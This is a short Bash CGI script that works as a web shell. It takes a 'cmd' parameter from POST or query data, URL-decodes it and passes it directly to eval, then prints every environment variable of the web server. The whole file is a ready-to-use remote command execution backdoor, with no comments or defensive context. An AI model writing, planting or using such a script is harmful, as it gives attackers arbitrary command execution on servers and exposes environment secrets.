#!/bin/bash

echo -e "Content-type: text/html\n\n"

if [ "${REQUEST_METHOD}" = "POST" ]; then
	read -r QUERY_STRING
fi

urldecode() {
	echo -e "$(sed 's/+/ /g; s/%/\\x/g')"
}

echo "========================================"
echo "Result:"
echo "========================================<br/>"
eval "$(echo "${QUERY_STRING}" | sed 's|cmd=||' | urldecode)"
echo "<br/>"
echo "========================================"
echo "Environment:"
echo "========================================<br/>"
env
echo ""
